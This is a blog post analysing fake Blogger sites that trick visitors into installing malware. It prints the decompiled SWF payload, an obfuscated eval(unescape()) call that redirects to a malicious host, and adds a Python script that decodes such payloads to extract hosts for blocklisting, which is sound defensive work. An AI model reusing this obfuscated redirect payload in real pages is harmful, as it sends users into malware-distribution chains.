Yesterday I noticed that all of a sudden no less than 6 new sites linked to this small-time blog. Great, huh? Except when checking out those blogs (all on Google’s Blogger platform, by the way), I quickly saw they were fake, attempting to trick users into installing malware on their Windows PCs.
Being the curious would-be hacker I am, I took the plunge to see how these guys go about trying to infect careless users:
- the blog post contains what seems to be a YouTube movie, but which actually is just an animated GIF with a link behind it
- when clicking “the movie” to play, an SWF file is downloaded (blog.swf)
- that blog.swf (which I downloaded on my Linux box and decompiled on the command line using flare) contains this simple code (quoting normalised; the original had the inner and outer quotes mangled by the blog software):
- this.getURL('javascript:eval(unescape("%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%2F%2F%6D%30%38%62%2E%63%6F%6D%2F%69%6E%2E%63%67%69%3F%64%65%66%61%75%6C%74%22%3B"))');
- which roughly translates to: go to http://m08b.com/in.cgi?default
- and that URL then takes you for a rollercoaster ride, going through several redirector sites before arriving in a dark corner of the web where you’re told to install an ActiveX component to watch a movie, or a codec, or sometimes even (the irony) antivirus software from some unknown company.
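To triage a decompiled SWF like this one without pasting the payload into a browser, the following added example (my own code, not from the post or from flare) decodes the unescape()-encoded JavaScript behind getURL() and pulls out the redirect target. The sample input is the line above, reconstructed with consistent quoting; js_unescape() also handles the %uXXXX form that JavaScript’s unescape() accepts but urllib does not.

```python
import re
from urllib.parse import urlparse

# Constructed sample: the decompiled ActionScript line from the post,
# with the quoting normalised so that it parses as code.
SAMPLE = (
    "this.getURL('javascript:eval(unescape(\"%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E"
    "%20%3D%20%22%2F%2F%6D%30%38%62%2E%63%6F%6D%2F%69%6E%2E%63%67%69%3F%64%65%66%61%75%6C%74"
    "%22%3B\"))');"
)

def js_unescape(s: str) -> str:
    """Mimic JavaScript's unescape(): decodes both %XX and %uXXXX sequences.
    urllib.parse.unquote is deliberately not used, as it ignores %uXXXX."""
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})', repl, s)

# getURL('javascript:eval(unescape("<encoded>"))') with either quote style
GETURL_RE = re.compile(
    r"""getURL\(\s*(['"])javascript:eval\(unescape\((['"])(.*?)\2\)\)\1""",
    re.DOTALL)
# window.location = "<target>";  (also document/self/top and .href variants)
LOCATION_RE = re.compile(
    r"""(?:window|document|self|top)\.location(?:\.href)?\s*=\s*(['"])(.*?)\1""")

def extract_redirects(decompiled: str) -> list:
    """Return (decoded_js, target_url) for every eval(unescape()) getURL call.
    target_url is None when the decoded JS assigns no location, which is a
    signal that the payload does something else and deserves a manual look."""
    results = []
    for m in GETURL_RE.finditer(decompiled):
        js = js_unescape(m.group(3))
        loc = LOCATION_RE.search(js)
        results.append((js, loc.group(2) if loc else None))
    return results

def target_host(url: str) -> str:
    """Hostname of a redirect target; handles protocol-relative '//host/path'."""
    if url.startswith('//'):
        url = 'http:' + url
    return urlparse(url).hostname or ''

if __name__ == "__main__":
    for js, target in extract_redirects(SAMPLE):
        print("decoded JS :", js)
        print("redirects to:", target, "(host:", target_host(target) + ")")
```

The decoded string is the one the post paraphrases: window.location = "//m08b.com/in.cgi?default"; the hostname is what you would feed into a blocklist or a proxy log search.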
Some lessons learned:
- Flash is evil (or it can be), as it allows attackers to hide malicious code inside a nice-looking (and binary) SWF file.
- Don’t trust the incoming-links functionality Google’s Blog Search provides (I switched back to Technorati for the ‘binnenkomers’ widget on my blog).
- The ‘Report Web Forgery’ function in Firefox (under ‘Help’) works great. Use it!